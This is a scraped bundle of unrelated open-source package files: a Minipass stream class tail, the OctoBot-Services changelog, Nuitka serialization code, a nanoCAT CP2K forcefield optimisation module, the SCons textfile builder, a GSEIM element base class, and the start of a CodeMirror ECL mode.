this[OBJECTMODE]
? Promise.reject(new Error('cannot concat in objectMode'))
: this[ENCODING]
? buf.join('')
: Buffer.concat(buf, buf.dataLength)
)
}
// stream.promise().then(() => done, er => emitted error)
promise() {
return new Promise((resolve, reject) => {
this.on(DESTROYED, () => reject(new Error('stream destroyed')))
this.on('error', er => reject(er))
this.on('end', () => resolve())
})
}
// for await (let chunk of stream)
[ASYNCITERATOR]() {
let stopped = false
const stop = () => {
this.pause()
stopped = true
return Promise.resolve({ done: true })
}
const next = () => {
if (stopped) return stop()
const res = this.read()
if (res !== null) return Promise.resolve({ done: false, value: res })
if (this[EOF]) return stop()
let resolve = null
let reject = null
const onerr = er => {
this.removeListener('data', ondata)
this.removeListener('end', onend)
this.removeListener(DESTROYED, ondestroy)
stop()
reject(er)
}
const ondata = value => {
this.removeListener('error', onerr)
this.removeListener('end', onend)
this.removeListener(DESTROYED, ondestroy)
this.pause()
resolve({ value: value, done: !!this[EOF] })
}
const onend = () => {
this.removeListener('error', onerr)
this.removeListener('data', ondata)
this.removeListener(DESTROYED, ondestroy)
stop()
resolve({ done: true })
}
const ondestroy = () => onerr(new Error('stream destroyed'))
return new Promise((res, rej) => {
reject = rej
resolve = res
this.once(DESTROYED, ondestroy)
this.once('error', onerr)
this.once('end', onend)
this.once('data', ondata)
})
}
return {
next,
throw: stop,
return: stop,
[ASYNCITERATOR]() {
return this
},
}
}
// for (let chunk of stream)
[ITERATOR]() {
let stopped = false
const stop = () => {
this.pause()
this.removeListener(ERROR, stop)
this.removeListener(DESTROYED, stop)
this.removeListener('end', stop)
stopped = true
return { done: true }
}
const next = () => {
if (stopped) return stop()
const value = this.read()
return value === null ? stop() : { value }
}
this.once('end', stop)
this.once(ERROR, stop)
this.once(DESTROYED, stop)
return {
next,
throw: stop,
return: stop,
[ITERATOR]() {
return this
},
}
}
destroy(er) {
if (this[DESTROYED]) {
if (er) this.emit('error', er)
else this.emit(DESTROYED)
return this
}
this[DESTROYED] = true
// throw away all buffered data, it's never coming out
this[BUFFER].length = 0
this[BUFFERLENGTH] = 0
if (typeof this.close === 'function' && !this[CLOSED]) this.close()
if (er) this.emit('error', er)
// if no error to emit, still reject pending promises
else this.emit(DESTROYED)
return this
}
static isStream(s) {
return (
!!s &&
(s instanceof Minipass ||
s instanceof Stream ||
(s instanceof EE &&
// readable
(typeof s.pipe === 'function' ||
// writable
(typeof s.write === 'function' && typeof s.end === 'function'))))
)
}
}
exports.Minipass = Minipass | PypiClean |
/OctoBot-Services-1.6.2.tar.gz/OctoBot-Services-1.6.2/CHANGELOG.md | # Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
## [1.6.2] - 2023-08-18
### Updated
- [Requirements] update dependencies
## [1.6.1] - 2023-07-23
### Updated
- [ReturningStartable] add threaded_start
## [1.6.0] - 2023-05-02
### Updated
- Supported python versions
## [1.5.6] - 2023-05-02
### Updated
- [Dependencies] flask, ngrok and openai
## [1.5.5] - 2023-04-23
### Updated
- [BotInterface] set_risk command now updated edited config
## [1.5.4] - 2023-03-30
### Updated
- [Orders] Order channel callback
## [1.5.3] - 2023-03-29
### Added
- [Services] Add GPT requirements
### Updated
- [Services] Dependencies
## [1.5.2] - 2023-03-24
### Updated
- [Services] Improve portfolio output
## [1.5.1] - 2023-03-22
### Updated
- [Services] Add reference market value in portfolio pretty print
## [1.5.0] - 2023-03-15
### Updated
- [Services] stop is now async
- [Telegram] migrate to async version of the lib
## [1.4.4] - 2023-03-01
### Updated
- [API] trading apis
## [1.4.3] - 2023-02-04
### Updated
- [NotificationLevel] replace DANGER by ERROR
## [1.4.2] - 2023-02-03
### Removed
- [Requirements] Python-Twitter as Twitter API will become paid only
## [1.4.1] - 2022-12-29
### Added
- [Requirements] flask_cors
## [1.4.0] - 2022-12-23
### Updated
- [Requirements] Bump
## [1.3.10] - 2022-12-13
### Updated
- [Requirements] Restore gevent==22.10.2
## [1.3.9] - 2022-12-11
### Updated
- [Requirements] Restore gevent==21.12.0 due to glibc incompatibility (https://github.com/gevent/gevent/blob/master/CHANGES.rst#22102-2022-10-31)
## [1.3.8] - 2022-12-09
### Updated
- [Requirements] bump requirements
## [1.3.7] - 2022-10-17
### Updated
- [Positions] close position
## [1.3.6] - 2022-09-08
### Updated
- [AsyncTools] add timeout param
## [1.3.5] - 2022-08-25
### Updated
- [Dependencies] update to latest reddit, telegram, ngrok and flask versions
## [1.3.4] - 2022-08-11
### Updated
- [AsyncTools] add log_exceptions param
## [1.3.3] - 2022-07-29
### Updated
- [Requirements] bump web interface requirements
## [1.3.2] - 2022-07-02
### Updated
- [Requirements] bump requirements
## [1.3.1] - 2022-06-06
### Updated
- [Notifications] always create notification channel
## [1.3.0] - 2022-05-04
### Added
- Notification sounds
### Updated
- Flask requirement
## [1.2.32] - 2022-02-18
### Updated
- Flask requirement
## [1.2.31] - 2022-01-20
### Updated
- requirements
## [1.2.30] - 2022-01-16
### Updated
- requirements
### Fixed
- [Telegram] RPC login error
## [1.2.29] - 2021-12-19
### Updated
- [Util][Portfolio] Migrate to assets
## [1.2.28] - 2021-11-24
### Added
- [Constants] CONFIG_ENABLE_NGROK
## [1.2.27] - 2021-10-28
### Added
- flask-compress requirements
- flask-cache requirements
## [1.2.26] - 2021-09-21
### Updated
- requirements
## [1.2.25] - 2021-09-13
### Added
- AbstractBotInterface set_command_restart method
## [1.2.24] - 2021-09-03
### Updated
- requirements
## [1.2.23] - 2021-07-28
### Updated
- requirements
## [1.2.22] - 2021-07-17
### Updated
- changed missing configuration warning into info
- requirements
## [1.2.21] - 2021-07-09
### Updated
- requirements
## [1.2.20] - 2021-07-03
### Added
- CONFIG_ENABLE_NGROK constants
- CONFIG_WEBHOOK_SERVER_IP
- CONFIG_WEBHOOK_SERVER_PORT
## [1.2.19] - 2021-05-03
### Added
- async reddit api via asyncpraw
### Updated
- gevent and python-telegram-bot versions
## [1.2.18] - 2021-04-22
### Updated
- simplifiedpytrends version
## [1.2.17] - 2021-04-14
### Added
- CONFIG_MEDIA_PATH constant
## [1.2.16] - 2021-04-09
### Added
- telethon
- telegram api constants
## [1.2.15] - 2021-04-08
### Updated
- pyngrok version
## [1.2.14] - 2021-03-26
### Updated
- Requirements
## [1.2.13] - 2021-03-15
### Added
- User commands channel
## [1.2.12] - 2021-03-03
### Added
- Python 3.9 support
## [1.2.11] - 2020-01-04
### Updated
- requirements
## [1.2.10] - 2020-12-23
### Fixed
- has_trader exception
## [1.2.9] - 2020-12-23
### Added
- Profiles handling
### Fixed
- No activated trader situations
## [1.2.8] - 2020-12-16
### Updated
- Push notifications using async executor
- flask-socketio to 5.0.0
## [1.2.7] - 2020-12-06
### Fixed
- Notifiers when no config data
## [1.2.6] - 2020-11-26
### Added
- Services logo and url
## [1.2.5] - 2020-11-14
### Added
- Services logo and url
## [1.2.4] - 2020-11-07
### Updated
- Requirements
## [1.2.3] - 2020-10-27
### Updated
- Services warnings and errors on config issues
## [1.2.2] - 2020-10-26
### Updated
- Requirements
### Fixed
- Service init
## [1.2.1] - 2020-10-23
### Updated
- Python 3.8 support
## [1.2.0] - 2020-10-06
### Updated
- Migrate imports
## [1.1.22] - 2020-09-02
### Updated
- Order notifications for new order states management
## [1.1.21] - 2020-08-31
### Updated
- Order notifications for new order states management
## [1.1.20] - 2020-08-23
### Updated
- Requirements
## [1.1.19] - 2020-08-15
### Updated
- Requirements
## [1.1.18] - 2020-07-19
### Updated
- Refresh real trader changed into refresh portfolio
- Requirements
## [1.1.17] - 2020-06-21
### Updated
- Requirements
## [1.1.16] - 2020-06-20
### Fixed
- Services config update error
## [1.1.15] - 2020-06-07
### Updated
- Handle non trading exchanges
## [1.1.14] - 2020-06-02
### Added
- Web login
## [1.1.13] - 2020-05-27
### Update
- Cython version
## [1.1.12] - 2020-05-26
### Updated
- Requirements
## [1.1.11] - 2020-05-21
### Updated
- Remove advanced manager from commons
## [1.1.10] - 2020-05-19
### Added
- Config constants
## [1.1.9] - 2020-05-19
### Added
- OctoBot channels initialization
## [1.1.8] - 2020-05-18
### Added
- run_in_bot_async_executor util function
## [1.1.7] - 2020-05-17
### Fixed
- Bot interface config command
## [1.1.6] - 2020-05-16
### Updated
- Requirements
## [1.1.5] - 2020-05-15
### Updated
- OctoBot requirements
## [1.1.4] - 2020-05-10
### Updated
- Stop interface
- Telegram requirement
## [1.1.3] - 2020-05-10
### Updated
- Channel requirement
- Commons requirement
- Trading requirement
## [1.1.2] - 2020-05-06
### Added
- [Service] Webhook
## [1.1.1] - 2020-05-03
### Added
- Can now edit user config in services
## [1.1.0] - 2020-05-02
### Updated
- Octobot backtesting import paths
## [1.0.8] - 2020-05-01
### Added
- Include interfaces and notifications
## [1.0.7] - 2020-05-01
### Updated
- Handle multiple services for service feeds and interfaces
## [1.0.6] - 2020-04-17
### Updated
- python-telegram-bot requirement
## [1.0.5] - 2020-04-13
### Added
- ENV_WEB_ADDRESS environment constant
## [1.0.4] - 2020-04-13
### Added
- WEB_PORT environment constant
## [1.0.3] - 2020-04-10
### Added
- get_backtesting_service_feed api
- Service feed handling
## [1.0.2] - 2020-04-04
### Update
- Requirements version
### Fixed
- Travis CI file
## [1.0.1] - 2020-11-02
### Added
- Version update
## [1.0.0] - 2020-01-02
### Added
- Services
- Service-feeds
| PypiClean |
/Nuitka_winsvc-1.7.10-cp310-cp310-win_amd64.whl/nuitka/Serialization.py | import os
import pickle
import sys
from nuitka import OutputDirectories
from nuitka.__past__ import ( # pylint: disable=I0021,redefined-builtin
BaseExceptionGroup,
ExceptionGroup,
GenericAlias,
UnionType,
basestring,
to_byte,
xrange,
)
from nuitka.Builtins import (
builtin_anon_codes,
builtin_anon_values,
builtin_exception_values_list,
)
# TODO: Move to constants
from nuitka.code_generation.Namify import namifyConstant
from nuitka.containers.OrderedSets import OrderedSet
from nuitka.PythonVersions import python_version
from nuitka.utils.FileOperations import openTextFile
class BuiltinAnonValue(object):
"""Used to pickle anonymous values."""
# Python3 values has no index, turn into a tuple.
anon_values = tuple(builtin_anon_values.values())
def __init__(self, anon_name):
self.anon_name = anon_name
def getStreamValueByte(self):
"""Return byte value, encoding the anon built-in value."""
return to_byte(self.anon_values.index(self.anon_name))
class BuiltinGenericAliasValue(object):
"""For transporting GenericAlias values through pickler."""
def __init__(self, origin, args):
self.origin = origin
self.args = args
class BuiltinUnionTypeValue(object):
"""For transporting UnionType values through pickler."""
def __init__(self, args):
self.args = args
class BuiltinSpecialValue(object):
"""Used to pickle special values."""
def __init__(self, value):
self.value = value
def getStreamValueByte(self):
"""Return byte value, encoding the special built-in value."""
# Currently the only ones.
if self.value == "Ellipsis":
return to_byte(0)
elif self.value == "NotImplemented":
return to_byte(1)
elif self.value == "Py_SysVersionInfo":
return to_byte(2)
else:
assert False, self.value
class BlobData(object):
"""Used to pickle bytes to become raw pointers."""
__slots__ = ("data", "name")
def __init__(self, data, name):
self.data = data
self.name = name
def getData(self):
return self.data
def __repr__(self):
return "<nuitka.Serialization.BlobData %s>" % self.name
def _pickleAnonValues(pickler, value):
if value in builtin_anon_values:
pickler.save(BuiltinAnonValue(builtin_anon_values[value]))
elif value is Ellipsis:
pickler.save(BuiltinSpecialValue("Ellipsis"))
elif value is NotImplemented:
pickler.save(BuiltinSpecialValue("NotImplemented"))
elif value is sys.version_info:
pickler.save(BuiltinSpecialValue("Py_SysVersionInfo"))
else:
pickler.save_global(value)
def _pickleGenericAlias(pickler, value):
pickler.save(BuiltinGenericAliasValue(origin=value.__origin__, args=value.__args__))
def _pickleUnionType(pickler, value):
pickler.save(BuiltinUnionTypeValue(args=value.__args__))
class ConstantStreamWriter(object):
"""Write constants to a stream and return numbers for them."""
def __init__(self, filename):
self.count = 0
filename = os.path.join(OutputDirectories.getSourceDirectoryPath(), filename)
self.file = openTextFile(filename, "wb")
if python_version < 0x300:
self.pickle = pickle.Pickler(self.file, -1)
else:
self.pickle = pickle._Pickler( # pylint: disable=I0021,protected-access
self.file, -1
)
self.pickle.dispatch[type] = _pickleAnonValues
self.pickle.dispatch[type(Ellipsis)] = _pickleAnonValues
self.pickle.dispatch[type(NotImplemented)] = _pickleAnonValues
if type(sys.version_info) is not tuple:
self.pickle.dispatch[type(sys.version_info)] = _pickleAnonValues
# Standard pickling doesn't work with our necessary wrappers.
if python_version >= 0x390:
self.pickle.dispatch[GenericAlias] = _pickleGenericAlias
if python_version >= 0x3A0:
self.pickle.dispatch[UnionType] = _pickleUnionType
def addConstantValue(self, constant_value):
self.pickle.dump(constant_value)
self.count += 1
def addBlobData(self, data, name):
self.pickle.dump(BlobData(data, name))
self.count += 1
def close(self):
self.file.close()
class ConstantStreamReader(object):
def __init__(self, const_file):
self.count = 0
self.pickle = pickle.Unpickler(const_file)
def readConstantValue(self):
return self.pickle.load()
class ConstantAccessor(object):
def __init__(self, data_filename, top_level_name):
self.constants = OrderedSet()
self.constants_writer = ConstantStreamWriter(data_filename)
self.top_level_name = top_level_name
def getConstantCode(self, constant):
# Use in user code, or for constants building code itself, many
# constant types get special code immediately.
# pylint: disable=too-many-branches,too-many-statements
if constant is None:
key = "Py_None"
elif constant is True:
key = "Py_True"
elif constant is False:
key = "Py_False"
elif constant is Ellipsis:
key = "Py_Ellipsis"
elif constant is NotImplemented:
key = "Py_NotImplemented"
elif constant is sys.version_info:
key = "Py_SysVersionInfo"
elif type(constant) is type:
# TODO: Maybe make this a mapping in nuitka.Builtins
if constant is None:
key = "(PyObject *)Py_TYPE(Py_None)"
elif constant is object:
key = "(PyObject *)&PyBaseObject_Type"
elif constant is staticmethod:
key = "(PyObject *)&PyStaticMethod_Type"
elif constant is classmethod:
key = "(PyObject *)&PyClassMethod_Type"
elif constant is bytearray:
key = "(PyObject *)&PyByteArray_Type"
elif constant is enumerate:
key = "(PyObject *)&PyEnum_Type"
elif constant is frozenset:
key = "(PyObject *)&PyFrozenSet_Type"
elif python_version >= 0x270 and constant is memoryview:
key = "(PyObject *)&PyMemoryView_Type"
elif python_version < 0x300 and constant is basestring:
key = "(PyObject *)&PyBaseString_Type"
elif python_version < 0x300 and constant is xrange:
key = "(PyObject *)&PyRange_Type"
elif constant in builtin_anon_values:
key = "(PyObject *)" + builtin_anon_codes[builtin_anon_values[constant]]
elif constant in builtin_exception_values_list:
key = "(PyObject *)PyExc_%s" % constant.__name__
elif constant is ExceptionGroup:
key = "(PyObject *)_PyInterpreterState_GET()->exc_state.PyExc_ExceptionGroup"
elif constant is BaseExceptionGroup:
key = "(PyObject *)PyExc_BaseExceptionGroup"
else:
type_name = constant.__name__
if constant is int and python_version >= 0x300:
type_name = "long"
elif constant is str:
type_name = "string" if python_version < 0x300 else "unicode"
key = "(PyObject *)&Py%s_Type" % type_name.capitalize()
else:
key = "const_" + namifyConstant(constant)
if key not in self.constants:
self.constants.add(key)
self.constants_writer.addConstantValue(constant)
key = "%s[%d]" % (self.top_level_name, self.constants.index(key))
# TODO: Make it returning, more clear.
return key
def getBlobDataCode(self, data, name):
key = "blob_" + namifyConstant(data)
if key not in self.constants:
self.constants.add(key)
self.constants_writer.addBlobData(data=data, name=name)
key = "%s[%d]" % (self.top_level_name, self.constants.index(key))
return key
def getConstantsCount(self):
# Make sure to add no more after asking this.
self.constants_writer.close()
return len(self.constants) | PypiClean |
/Nano-CAT-0.7.2.tar.gz/Nano-CAT-0.7.2/nanoCAT/qd_opt_ff.py | import os
import warnings
from functools import wraps
from collections import abc
from typing import (
Collection, Iterable, Union, Dict, Tuple, List, Optional, Type, Callable
)
import numpy as np
import pandas as pd
from scm.plams import Molecule, Settings
from scm.plams.core.basejob import Job
from scm.plams.core.results import Results
from FOX import PSFContainer
from FOX.ff.lj_uff import combine_sigma, combine_epsilon
from .ff.cp2k_utils import set_cp2k_element
__all__ = ['qd_opt_ff']
def qd_opt_ff(mol: Molecule, jobs: Tuple[Optional[Type[Job]], ...],
settings: Tuple[Optional[Settings], ...], name: str = 'QD_opt',
new_psf: bool = False, job_func: Callable = Molecule.job_geometry_opt) -> Results:
"""Alternative implementation of :func:`.qd_opt` using CP2Ks' classical forcefields.
Performs an inplace update of **mol**.
Parameters
----------
mol : |plams.Molecule|_
The to-be optimized molecule.
jobs : :class:`tuple`
A tuple of |plams.Job| types and/or ``None``.
settings : :class:`tuple`
A tuple of |plams.Settings| types and/or ``None``.
name : str
The name of the job.
See Also
--------
:func:`CAT.attachment.qd_opt.qd_opt`
Default workflow for optimizing molecules.
"""
psf_name = os.path.join(mol.properties.path, mol.properties.name + '.psf')
# Prepare the job settings
job = jobs[0] if isinstance(jobs, abc.Sequence) else jobs
s = Settings(settings[0]) if isinstance(settings, abc.Sequence) else Settings(settings)
s.runscript.pre = (f'ln "{psf_name}" ./"{name}.psf"\n'
f'ln "{mol.properties.prm}" ./"{name}.prm"')
s.input.force_eval.subsys.topology.conn_file_name = f'{name}.psf'
s.input.force_eval.mm.forcefield.parm_file_name = f'{name}.prm'
set_cp2k_element(s, mol)
if not os.path.isfile(psf_name) or new_psf:
psf = get_psf(mol, s.input.force_eval.mm.forcefield.get('charge', None))
for at, charge, symbol in zip(mol, psf.charge, psf.atom_type):
at.properties.charge_float = charge
at.properties.symbol = symbol
psf.write(psf_name)
# Pull any missing non-covalent parameters from UFF
if s.input.force_eval.mm.forcefield.nonbonded.get('lennard-jones', None):
try:
finalize_lj(mol, s.input.force_eval.mm.forcefield.nonbonded['lennard-jones'])
except TypeError:
pass
results = job_func(mol, job, s, name=name, read_template=False, ret_results=True)
mol.round_coords()
return results
def get_psf(mol: Molecule, charges: Union[None, Settings, Iterable[Settings]]) -> PSFContainer:
"""Construct and return a :class:`PSF` instance.
.. _CHARGE: https://manual.cp2k.org/trunk/CP2K_INPUT/FORCE_EVAL/MM/FORCEFIELD/CHARGE.html
Parameters
----------
mol : |plams.Molecule|_
A PLAMS molecule which will be used for constructing the :class:`PSFContainer` instance.
s : |list|_ [|plams.Settings|_] or |plams.Settings|_
A list of settings constructed from the CP2K FORCE_EVAL/MM/FORCEFIELD/CHARGE_ block.
The settings are expected to contain the ``"charge"`` and ``"atom"`` keys.
"""
# Construct a PSF instance
psf = PSFContainer()
psf.generate_bonds(mol)
psf.generate_angles(mol)
psf.generate_dihedrals(mol)
psf.generate_impropers(mol)
psf.generate_atoms(mol)
# Update charges based on charges which have been explictly specified by the user
initial_charge = psf.charge.sum()
if isinstance(charges, Settings):
charge_dict = {charges.atom: charges.charge}
elif isinstance(charges, abc.Iterable):
charge_dict = {i.atom: i.charge for i in charges}
elif charges is None:
return psf
else:
raise TypeError(f"The parameter 'charges' is of invalid type: {repr(type(charges))}")
for at, charge in charge_dict.items():
psf.update_atom_charge(at, float(charge))
# Update atomic charges in order to reset the molecular charge to its initial value
constrain_charge(psf, initial_charge, charge_dict)
return psf
def constrain_charge(psf: PSFContainer, initial_charge: float = 0.0,
atom_set: Optional[Collection[str]] = None) -> None:
"""Set the total molecular charge of **psf** to **initial_charge**.
Atoms in **psf** whose atomic symbol intersects with **charge_set** will *not*
be altered.
Parameters
----------
psf : |nanoCAT.PSFContainer|_
A :class:`.PSF` instance with newly updated charges and/or atom types.
initial_charge : float
The initial charge of the system before the updating of atomic charges.
atom_set : |Container|_ [|str|_]
A container with atomic symbols.
Any atom in **psf** whose atomic symbol intersects with **charge_set** will *not*
be altered.
"""
# Check if the molecular charge has remained unchanged
new_charge = psf.charge.sum()
if (abs(new_charge) - abs(initial_charge)) < 10**-8: # i.e. 0.0 +- 10**-8
return psf
# Update atomic charges in order to reset the molecular charge to its initial value
if atom_set is None:
atom_subset = np.ones(len(psf.atoms), dtype=bool)
else:
atom_set_ = set(atom_set)
atom_subset = np.array([at not in atom_set_ for at in psf.atom_type])
charge_correction = initial_charge - psf.charge.sum()
charge_correction /= np.count_nonzero(atom_subset)
with pd.option_context('mode.chained_assignment', None):
psf.charge[atom_subset] += charge_correction
@wraps(constrain_charge)
def _constrain_charge(*args, **kwargs):
msg = "_constrain_charge() is deprecated; use constrain_charge() from now on"
warnings.warn(msg, category=DeprecationWarning)
return constrain_charge(*args, **kwargs)
def finalize_lj(mol: Molecule, s: List[Settings]) -> None:
"""Assign UFF Lennard-Jones parameters to all missing non-bonded core/ligand interactions.
.. _LENNARD_JONES: https://manual.cp2k.org/trunk/CP2K_INPUT/FORCE_EVAL/MM/FORCEFIELD/NONBONDED/LENNARD-JONES.html
Parameters
----------
mol : |plams.Molecule|_
A PLAMS molecule containing a core and ligand(s).
s : |list|_ [|plams.Settings|_]
A list of settings constructed from the
CP2K FORCE_EVAL/MM/FORCEFIELD/NONBONDED/`LENNARD-JONES`_ block.
The settings are expected to contain the ``"atoms"`` keys.
""" # noqa
# Create a set of all core atom types
core_at, lig_at = _gather_core_lig_symbols(mol)
# Create a set of all user-specified core/ligand LJ pairs
if not s:
s = []
elif isinstance(s, dict):
s = [s]
atom_pairs = {frozenset(s.atoms.split()) for s in s}
# Check if LJ parameters are present for all atom pairs.
# If not, supplement them with UFF parameters.
for at1, symbol1 in core_at.items():
for at2, symbol2 in lig_at.items():
at1_at2 = {at1, at2}
if at1_at2 in atom_pairs:
continue
s.append(Settings({
'atoms': f'{at1} {at2}',
'epsilon': f'[kcalmol] {round(combine_epsilon(symbol1, symbol2), 4)}',
'sigma': f'[angstrom] {round(combine_sigma(symbol1, symbol2), 4)}'
}))
def _gather_core_lig_symbols(mol: Molecule) -> Tuple[Dict[str, str], Dict[str, str]]:
"""Create two dictionaries with atom types and atomic symbols.
Both dictionaries contain atomic symbols as keys and matching atom types as values;
dictionary #1 for the core and #2 for the ligand(s).
Cores (``"COR"``) and ligands (``"LIG"``) are distinguished based on the value of each atoms'
:attr:`Atom.properties` ``["pdb_info"]["ResidueName"]`` attribute.
"""
iterator = iter(mol)
core_at = {}
lig_at = {}
# Fill the set with all core atom types
for at in iterator: # Iterate until the first ligand is encountered
if at.properties.pdb_info.ResidueName != 'COR':
break
if at.symbol not in core_at:
core_at[at.symbol] = at.symbol
# Fill the set with all ligand atom types
res_number = at.properties.pdb_info.ResidueNumber
lig_at[at.properties.symbol] = at.symbol
for at in iterator: # Iterate through a single ligand until the next ligand is encountered
if at.properties.pdb_info.ResidueNumber != res_number:
break
if at.symbol not in lig_at:
lig_at[at.properties.symbol] = at.symbol
return core_at, lig_at | PypiClean |
/Nuitka_fixed-1.1.2-cp310-cp310-win_amd64.whl/nuitka/build/inline_copy/lib/scons-4.4.0/SCons/Tool/textfile.py | import SCons
from SCons.Node import Node
from SCons.Node.Python import Value
from SCons.Util import is_String, is_Sequence, is_Dict, to_bytes
TEXTFILE_FILE_WRITE_MODE = 'w'
LINESEP = '\n'
def _do_subst(node, subs):
"""
Fetch the node contents and replace all instances of the keys with
their values. For example, if subs is
{'%VERSION%': '1.2345', '%BASE%': 'MyProg', '%prefix%': '/bin'},
then all instances of %VERSION% in the file will be replaced with
1.2345 and so forth.
"""
contents = node.get_text_contents()
if subs:
for (k, val) in subs:
contents = contents.replace(k, val)
if 'b' in TEXTFILE_FILE_WRITE_MODE:
try:
contents = bytearray(contents, 'utf-8')
except TypeError:
# TODO: this should not happen, get_text_contents returns text
contents = bytearray(contents)
return contents
def _action(target, source, env):
# prepare the line separator
linesep = env['LINESEPARATOR']
if linesep is None:
linesep = LINESEP # os.linesep
elif is_String(linesep):
pass
elif isinstance(linesep, Value):
linesep = linesep.get_text_contents()
else:
raise SCons.Errors.UserError('unexpected type/class for LINESEPARATOR: %s'
% repr(linesep), None)
if 'b' in TEXTFILE_FILE_WRITE_MODE:
linesep = to_bytes(linesep)
# create a dictionary to use for the substitutions
if 'SUBST_DICT' not in env:
subs = None # no substitutions
else:
subst_dict = env['SUBST_DICT']
if is_Dict(subst_dict):
subst_dict = list(subst_dict.items())
elif is_Sequence(subst_dict):
pass
else:
raise SCons.Errors.UserError('SUBST_DICT must be dict or sequence')
subs = []
for (k, value) in subst_dict:
if callable(value):
value = value()
if is_String(value):
value = env.subst(value, raw=1)
else:
value = str(value)
subs.append((k, value))
# write the file
try:
target_file = open(target[0].get_path(), TEXTFILE_FILE_WRITE_MODE, newline='')
except (OSError, IOError) as e:
raise SCons.Errors.UserError("Can't write target file %s [%s]" % (target[0],e))
# separate lines by 'linesep' only if linesep is not empty
lsep = None
for line in source:
if lsep:
target_file.write(lsep)
target_file.write(_do_subst(line, subs))
lsep = linesep
target_file.close()
def _strfunc(target, source, env):
return "Creating '%s'" % target[0]
def _convert_list_R(newlist, sources):
for elem in sources:
if is_Sequence(elem):
_convert_list_R(newlist, elem)
elif isinstance(elem, Node):
newlist.append(elem)
else:
newlist.append(Value(elem))
def _convert_list(target, source, env):
if len(target) != 1:
raise SCons.Errors.UserError("Only one target file allowed")
newlist = []
_convert_list_R(newlist, source)
return target, newlist
_common_varlist = ['SUBST_DICT', 'LINESEPARATOR']
_text_varlist = _common_varlist + ['TEXTFILEPREFIX', 'TEXTFILESUFFIX']
_text_builder = SCons.Builder.Builder(
action=SCons.Action.Action(_action, _strfunc, varlist=_text_varlist),
source_factory=Value,
emitter=_convert_list,
prefix='$TEXTFILEPREFIX',
suffix='$TEXTFILESUFFIX',
)
_subst_varlist = _common_varlist + ['SUBSTFILEPREFIX', 'SUBSTFILESUFFIX']
_subst_builder = SCons.Builder.Builder(
action=SCons.Action.Action(_action, _strfunc, varlist=_subst_varlist),
source_factory=SCons.Node.FS.File,
emitter=_convert_list,
prefix='$SUBSTFILEPREFIX',
suffix='$SUBSTFILESUFFIX',
src_suffix=['.in'],
)
def generate(env):
env['LINESEPARATOR'] = LINESEP # os.linesep
env['BUILDERS']['Textfile'] = _text_builder
env['TEXTFILEPREFIX'] = ''
env['TEXTFILESUFFIX'] = '.txt'
env['BUILDERS']['Substfile'] = _subst_builder
env['SUBSTFILEPREFIX'] = ''
env['SUBSTFILESUFFIX'] = ''
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | PypiClean |
/GSEIM-1.4.tar.gz/GSEIM-1.4/src/grc/core/base.py |
import weakref
from .utils.descriptors import lazy_property
class Element(object):
def __init__(self, parent=None):
self._parent = weakref.ref(parent) if parent else lambda: None
self._error_messages = []
# Element Validation API
def validate(self):
"""
Validate this element and call validate on all children.
Call this base method before adding error messages in the subclass.
"""
del self._error_messages[:]
for child in self.children():
child.validate()
def is_valid(self):
"""
Is this element valid?
Returns:
true when the element is enabled and has no error messages or is bypassed
"""
return not next(self.iter_error_messages(), False)
def add_error_message(self, msg):
"""
Add an error message to the list of errors.
Args:
msg: the error message string
"""
self._error_messages.append(msg)
def get_error_messages(self):
"""
Get the list of error messages from this element and all of its children.
Do not include the error messages from disabled or bypassed children.
Cleverly indent the children error messages for printing purposes.
Returns:
a list of error message strings
"""
return [msg if elem is self else "{}:\n\t{}".format(elem, msg.replace("\n", "\n\t"))
for elem, msg in self.iter_error_messages()]
def iter_error_messages(self):
"""
Iterate over error messages. Yields tuples of (element, message)
"""
for msg in self._error_messages:
print('grc/core/base.py: msg =', msg)
yield self, msg
for child in self.children():
for element_msg in child.iter_error_messages():
yield element_msg
def rewrite(self):
"""
Rewrite this element and call rewrite on all children.
Call this base method before rewriting the element.
"""
for child in self.children():
child.rewrite()
@property
def enabled(self):
return True
# Tree-like API
@property
def parent(self):
return self._parent()
def get_parent_by_type(self, cls):
parent = self.parent
if parent is None:
return None
elif isinstance(parent, cls):
return parent
else:
return parent.get_parent_by_type(cls)
@lazy_property
def parent_platform(self):
from .platform import Platform
return self.get_parent_by_type(Platform)
@lazy_property
def parent_flowgraph(self):
from .FlowGraph import FlowGraph
return self.get_parent_by_type(FlowGraph)
@lazy_property
def parent_block(self):
from .blocks import Block
return self.get_parent_by_type(Block)
def reset_parents_by_type(self):
"""Reset all lazy properties"""
for name, obj in vars(Element): # explicitly only in Element, not subclasses
if isinstance(obj, lazy_property):
delattr(self, name)
def children(self):
return
yield # empty generator
# Type testing
is_flow_graph = False
is_block = False
is_dummy_block = False
is_connection = False
is_port = False
is_param = False
is_variable = False
is_import = False
is_snippet = False
def get_raw(self, name):
descriptor = getattr(self.__class__, name, None)
if not descriptor:
raise ValueError("No evaluated property '{}' found".format(name))
return getattr(self, descriptor.name_raw, None) or getattr(self, descriptor.name, None)
def set_evaluated(self, name, value):
descriptor = getattr(self.__class__, name, None)
if not descriptor:
raise ValueError("No evaluated property '{}' found".format(name))
self.__dict__[descriptor.name] = value | PypiClean |
/FlaskCms-0.0.4.tar.gz/FlaskCms-0.0.4/flask_cms/static/js/ckeditor/plugins/codemirror/js/mode/ecl/ecl.js |
(function(mod) {
if (typeof exports == "object" && typeof module == "object") // CommonJS
mod(require("../../lib/codemirror"));
else if (typeof define == "function" && define.amd) // AMD
define(["../../lib/codemirror"], mod);
else // Plain browser env
mod(CodeMirror);
})(function(CodeMirror) {
"use strict";
CodeMirror.defineMode("ecl", function(config) {
function words(str) {
var obj = {}, words = str.split(" ");
for (var i = 0; i < words.length; ++i) obj[words[i]] = true;
return obj;
}
function metaHook(stream, state) {
if (!state.startOfLine) return false;
stream.skipToEnd();
return "meta";
}
var indentUnit = config.indentUnit;
